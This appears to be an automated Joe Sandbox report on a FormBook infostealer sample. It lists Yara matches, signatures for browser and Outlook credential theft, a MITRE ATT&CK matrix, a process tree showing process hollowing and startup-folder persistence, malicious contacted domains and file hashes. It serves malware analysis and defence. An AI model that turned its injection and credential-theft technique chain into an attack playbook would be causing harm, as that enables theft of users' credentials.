          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\f5cZJ0WC0H.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
          Source: C:\Users\user\Desktop\f5cZJ0WC0H.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct

          Stealing of Sensitive Information:

          Yara detected FormBook
          Source: Yara match | File source: 00000017.00000002.387510478.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000018.00000002.501338482.0000000000500000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000015.00000002.437203324.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.247225412.00000000044D6000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000018.00000002.504034660.00000000009B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.246128519.0000000004389000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000015.00000002.438245140.0000000000C70000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000017.00000002.389389710.0000000001050000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000013.00000002.383962255.0000000003B52000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000013.00000002.383860155.0000000003AD6000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000013.00000002.382240548.0000000003989000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000018.00000002.503765338.0000000000980000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000001F.00000002.439648635.00000000004C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000012.00000002.368138298.0000000003896000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000012.00000002.368427184.0000000003913000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000017.00000002.388561440.0000000000B40000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000012.00000002.367211386.0000000003749000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000015.00000002.438147328.0000000000C40000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 23.2.f5cZJ0WC0H.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 21.2.f5cZJ0WC0H.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 21.2.f5cZJ0WC0H.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 23.2.f5cZJ0WC0H.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Windows\SysWOW64\help.exe | File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data
          Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
          Tries to steal Mail credentials (via file access)
          Source: C:\Windows\SysWOW64\help.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

          Remote Access Functionality:

          Yara detected FormBook
          Source: Yara match | File source: 00000017.00000002.387510478.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000018.00000002.501338482.0000000000500000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000015.00000002.437203324.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.247225412.00000000044D6000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000018.00000002.504034660.00000000009B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.246128519.0000000004389000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000015.00000002.438245140.0000000000C70000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000017.00000002.389389710.0000000001050000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000013.00000002.383962255.0000000003B52000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000013.00000002.383860155.0000000003AD6000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000013.00000002.382240548.0000000003989000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000018.00000002.503765338.0000000000980000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000001F.00000002.439648635.00000000004C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000012.00000002.368138298.0000000003896000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000012.00000002.368427184.0000000003913000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000017.00000002.388561440.0000000000B40000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000012.00000002.367211386.0000000003749000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000015.00000002.438147328.0000000000C40000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 23.2.f5cZJ0WC0H.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 21.2.f5cZJ0WC0H.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 21.2.f5cZJ0WC0H.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 23.2.f5cZJ0WC0H.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          The matrix is listed here column by column (one tactic per line, techniques in the row order of the original table); a number in parentheses after a technique is the count badge shown next to it in the original.

          Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
          Execution: Windows Management Instrumentation (1); Scripting (1); Shared Modules (1); Command and Scripting Interpreter (1); PowerShell (1); Launchd; Scheduled Task; Command and Scripting Interpreter; PowerShell; AppleScript
          Persistence: Registry Run Keys / Startup Folder (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux); At (Windows)
          Privilege Escalation: Process Injection (512); Registry Run Keys / Startup Folder (1); Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux); At (Windows)
          Defense Evasion: Disable or Modify Tools (1); Deobfuscate/Decode Files or Information (1); Scripting (1); Obfuscated Files or Information (4); Software Packing (13); Timestomp (1); Rootkit (1); Masquerading (1); Virtualization/Sandbox Evasion (4); Process Injection (512)
          Credential Access: OS Credential Dumping (1); Credential API Hooking (1); Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
          Discovery: File and Directory Discovery (3); System Information Discovery (113); Query Registry (1); Security Software Discovery (141); Virtualization/Sandbox Evasion (4); Process Discovery (2); Application Window Discovery (1); Remote System Discovery (1); System Network Configuration Discovery (1); Process Discovery
          Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot; Software Deployment Tools; Taint Shared Content
          Collection: Archive Collected Data (1); Data from Local System (1); Email Collection (1); Credential API Hooking (1); Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
          Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol
          Command and Control: Encrypted Channel (1); Non-Application Layer Protocol (1); Application Layer Protocol (1); Protocol Impersonation; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
          Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols; Rogue Cellular Base Station
          Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
          Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue; Data Destruction; Data Encrypted for Impact

          Behavior Graph

          Behavior Graph ID: 323830 | Sample: f5cZJ0WC0H | Startdate: 27/11/2020 | Architecture: WINDOWS | Score: 100
          Domains contacted from the root node: www.procertinspections.com; procertinspections.com; g.msn.com
          Signatures on the root node: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Malicious sample detected (through community Yara rule); Sigma detected: Steal Google chrome login data; 8 other signatures

          Process tree recovered from the graph (numbers after a process name are the count badges shown in the original; signatures attached to a node are in square brackets):

          f5cZJ0WC0H.exe 3 (started)
            cmd.exe 1 (started) [Suspicious powershell command line found]
              powershell.exe 17 (started)
                f5cZJ0WC0H.exe 3 (started) [Injects a PE file into a foreign processes]
                  f5cZJ0WC0H.exe (started) [Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)]
                    explorer.exe (injected); contacts www.therealnarzkollections.com
                      help.exe 18 (started) [Detected FormBook malware; Tries to steal Mail credentials (via file access); Tries to harvest and steal browser information (history, passwords, etc); 2 other signatures]; dropped: C:\Users\user\AppData\...\7-Nlogrv.ini (data), C:\Users\user\AppData\...\7-Nlogri.ini (data)
                        cmd.exe 2 (started) [Tries to harvest and steal browser information (history, passwords, etc)]; dropped: C:\Users\user\AppData\Local\Temp\DB1 (SQLite)
                          conhost.exe (started)
                      ipconfig.exe (started) [Tries to detect virtualization through RDTSC time measurements]
                      autoconv.exe (started)
                wscript.exe (started) [Drops PE files to the startup folder]
              conhost.exe (started)
              timeout.exe 1 (started)
          f5cZJ0WC0H.exe 2 (started) [Injects a PE file into a foreign processes]
            f5cZJ0WC0H.exe (started) [Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique]


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          No Antivirus matches

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          Source | Detection | Scanner | Label
          23.2.f5cZJ0WC0H.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          21.2.f5cZJ0WC0H.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

          No Antivirus matches

          URLs

          Source | Detection | Scanner | Label
          http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
          http://www.procertinspections.com/zsh/ | 0% | Avira URL Cloud | safe
          http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
          https://go.micro | 0% | URL Reputation | safe
          https://contoso.com/License | 0% | URL Reputation | safe
          https://contoso.com/Icon | 0% | URL Reputation | safe
          http://www.tiro.com | 0% | URL Reputation | safe
          http://www.goodfont.co.kr | 0% | URL Reputation | safe
          http://www.carterandcone.coml | 0% | URL Reputation | safe
          http://www.sajatypeworks.com | 0% | URL Reputation | safe
          http://www.typography.netD | 0% | URL Reputation | safe
          http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
          http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
          http://fontfabrik.com | 0% | URL Reputation | safe
          http://www.founder.com.cn/cn | 0% | URL Reputation | safe
          http://www.procertinspections.com | 0% | Avira URL Cloud | safe
          http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
          https://contoso.com/ | 0% | URL Reputation | safe
          http://pesterbdd.com/images/Pester.pngd | 0% | Avira URL Cloud | safe
          http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
          http://www.sandoll.co.kr | 0% | URL Reputation | safe
          http://www.urwpp.deDPlease | 0% | URL Reputation | safe
          http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
          http://www.sakkal.com | 0% | URL Reputation | safe

          Domains and IPs

          Contacted Domains

          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          procertinspections.com | 34.98.99.30 | true | true | (none) | unknown
          www.therealnarzkollections.com | unknown | unknown | true | (none) | unknown
          www.procertinspections.com | unknown | unknown | true | (none) | unknown
          g.msn.com | unknown | unknown | false | (none) | high

                  URLs from Memory and Binaries

          Name | Source | Malicious | Antivirus Detection | Reputation
          http://nuget.org/NuGet.exe | powershell.exe, 00000005.00000002.348999474.00000000064A3000.00000004.00000001.sdmp | false | (none) | high
          http://www.apache.org/licenses/LICENSE-2.0 | explorer.exe, 00000016.00000000.396603831.000000000BC36000.00000002.00000001.sdmp | false | (none) | high
          http://www.fontbureau.com | explorer.exe, 00000016.00000000.396603831.000000000BC36000.00000002.00000001.sdmp | false | (none) | high
          http://www.fontbureau.com/designersG | explorer.exe, 00000016.00000000.396603831.000000000BC36000.00000002.00000001.sdmp | false | (none) | high
          http://www.fontbureau.com/designers/? | explorer.exe, 00000016.00000000.396603831.000000000BC36000.00000002.00000001.sdmp | false | (none) | high
          http://www.founder.com.cn/cn/bThe | explorer.exe, 00000016.00000000.396603831.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.procertinspections.com/zsh/ | help.exe, 00000018.00000002.509412019.0000000003389000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
          http://pesterbdd.com/images/Pester.png | powershell.exe, 00000005.00000002.340189999.0000000005583000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000005.00000002.340189999.0000000005583000.00000004.00000001.sdmp | false | (none) | high
          http://www.fontbureau.com/designers? | explorer.exe, 00000016.00000000.396603831.000000000BC36000.00000002.00000001.sdmp | false | (none) | high
          https://go.micro | powershell.exe, 00000005.00000002.341468263.00000000057B2000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
          https://contoso.com/License | powershell.exe, 00000005.00000002.348999474.00000000064A3000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
          https://contoso.com/Icon | powershell.exe, 00000005.00000002.348999474.00000000064A3000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
          https://github.com/Pester/Pesterd | powershell.exe, 00000005.00000002.340189999.0000000005583000.00000004.00000001.sdmp | false | (none) | high
          http://www.tiro.com | explorer.exe, 00000016.00000000.396603831.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
          http://www.fontbureau.com/designers | explorer.exe, 00000016.00000000.396603831.000000000BC36000.00000002.00000001.sdmp | false | (none) | high
                                    http://www.goodfont.co.krexplorer.exe, 00000016.00000000.396603831.000000000BC36000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    https://github.com/Pester/Pesterpowershell.exe, 00000005.00000002.340189999.0000000005583000.00000004.00000001.sdmpfalse
                                      high
                                      http://www.carterandcone.comlexplorer.exe, 00000016.00000000.396603831.000000000BC36000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://www.sajatypeworks.comexplorer.exe, 00000016.00000000.396603831.000000000BC36000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://www.typography.netDexplorer.exe, 00000016.00000000.396603831.000000000BC36000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000016.00000000.396603831.000000000BC36000.00000002.00000001.sdmpfalse
                                        high
                                        http://www.founder.com.cn/cn/cTheexplorer.exe, 00000016.00000000.396603831.000000000BC36000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000016.00000000.396603831.000000000BC36000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        http://fontfabrik.comexplorer.exe, 00000016.00000000.396603831.000000000BC36000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        http://www.founder.com.cn/cnexplorer.exe, 00000016.00000000.396603831.000000000BC36000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        http://www.fontbureau.com/designers/frere-jones.htmlexplorer.exe, 00000016.00000000.396603831.000000000BC36000.00000002.00000001.sdmpfalse
                                          high
                                          http://www.procertinspections.comhelp.exe, 00000018.00000002.509412019.0000000003389000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.apache.org/licenses/LICENSE-2.0.htmldpowershell.exe, 00000005.00000002.340189999.0000000005583000.00000004.00000001.sdmpfalse
                                            high
                                            http://www.jiyu-kobo.co.jp/explorer.exe, 00000016.00000000.396603831.000000000BC36000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            https://contoso.com/powershell.exe, 00000005.00000002.348999474.00000000064A3000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            https://nuget.org/nuget.exepowershell.exe, 00000005.00000002.348999474.00000000064A3000.00000004.00000001.sdmpfalse
                                              high
                                              http://pesterbdd.com/images/Pester.pngdpowershell.exe, 00000005.00000002.340189999.0000000005583000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000016.00000000.396603831.000000000BC36000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              http://www.fontbureau.com/designers8explorer.exe, 00000016.00000000.396603831.000000000BC36000.00000002.00000001.sdmpfalse
                                                high
                                                http://www.fonts.comexplorer.exe, 00000016.00000000.396603831.000000000BC36000.00000002.00000001.sdmpfalse
                                                  high
                                                  http://www.sandoll.co.krexplorer.exe, 00000016.00000000.396603831.000000000BC36000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.urwpp.deDPleaseexplorer.exe, 00000016.00000000.396603831.000000000BC36000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.zhongyicts.com.cnexplorer.exe, 00000016.00000000.396603831.000000000BC36000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000005.00000002.339869504.0000000005441000.00000004.00000001.sdmpfalse
                                                    high
                                                    http://www.sakkal.comexplorer.exe, 00000016.00000000.396603831.000000000BC36000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown

                                                    Contacted IPs

                                                    No contacted IP infos

                                                    General Information

Joe Sandbox Version: 31.0.0 Red Diamond
Analysis ID: 323830
Start date: 27.11.2020
Start time: 15:57:04
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 12m 14s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: f5cZJ0WC0H (renamed file extension from none to exe)
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed: 31
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.adwa.spyw.evad.winEXE@23/11@5/0
EGA Information: Failed
HDC Information:
• Successful, ratio: 6.9% (good quality ratio 6.3%)
• Quality average: 71.4%
• Quality standard deviation: 30.8%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 110
• Number of non-executed functions: 131
Cookbook Comments:
• Adjust boot time
• Enable AMSI
Warnings:
                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                    • Excluded IPs from analysis (whitelisted): 23.210.248.85, 168.61.161.212, 52.255.188.83, 104.43.139.144, 51.104.144.132, 20.54.26.129, 93.184.221.240, 8.248.113.254, 67.26.83.254, 8.253.204.120, 8.253.95.249, 8.241.121.254, 52.242.211.89, 52.142.114.176, 92.122.213.194, 92.122.213.247
                                                    • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wns.notify.windows.com.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, wu.azureedge.net, g-msn-com-nsatc.trafficmanager.net, par02p.wns.notify.windows.com.akadns.net, emea1.notify.windows.com.akadns.net, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, wu.wpc.apr-52dd2.edgecastdns.net, au-bg-shim.trafficmanager.net, dm3p.wns.notify.windows.com.akadns.net, client.wns.windows.com, fs.microsoft.com, wu.ec.azureedge.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, blobcollector.events.data.trafficmanager.net
                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                    • VT rate limit hit for: /opt/package/joesandbox/database/analysis/323830/sample/f5cZJ0WC0H.exe

                                                    Simulations

                                                    Behavior and APIs

Time | Type | Description
15:57:58 | API Interceptor | 3x Sleep call for process: f5cZJ0WC0H.exe modified
15:58:32 | API Interceptor | 34x Sleep call for process: powershell.exe modified
15:58:42 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe

                                                    Joe Sandbox View / Context

                                                    IPs

                                                    No context

                                                    Domains

                                                    No context

                                                    ASN

                                                    No context

                                                    JA3 Fingerprints

                                                    No context

                                                    Dropped Files

                                                    No context

                                                    Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\f5cZJ0WC0H.exe.log
Process: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1216
Entropy (8bit): 5.355304211458859
Encrypted: false
SSDEEP: 24:MLUE4K5E4Ks2E1qE4x84qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHxviYHKhQnoPtHoxHhAHY
MD5: 69206D3AF7D6EFD08F4B4726998856D3
SHA1: E778D4BF781F7712163CF5E2F5E7C15953E484CF
SHA-256: A937AD22F9C3E667A062BA0E116672960CD93522F6997C77C00370755929BA87
SHA-512: CD270C3DF75E548C9B0727F13F44F45262BD474336E89AAEBE56FABFE8076CD4638F88D3C0837B67C2EB3C54055679B07E4212FB3FEDBF88C015EB5DBBCD7FF8
Malicious: false
                                                    Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
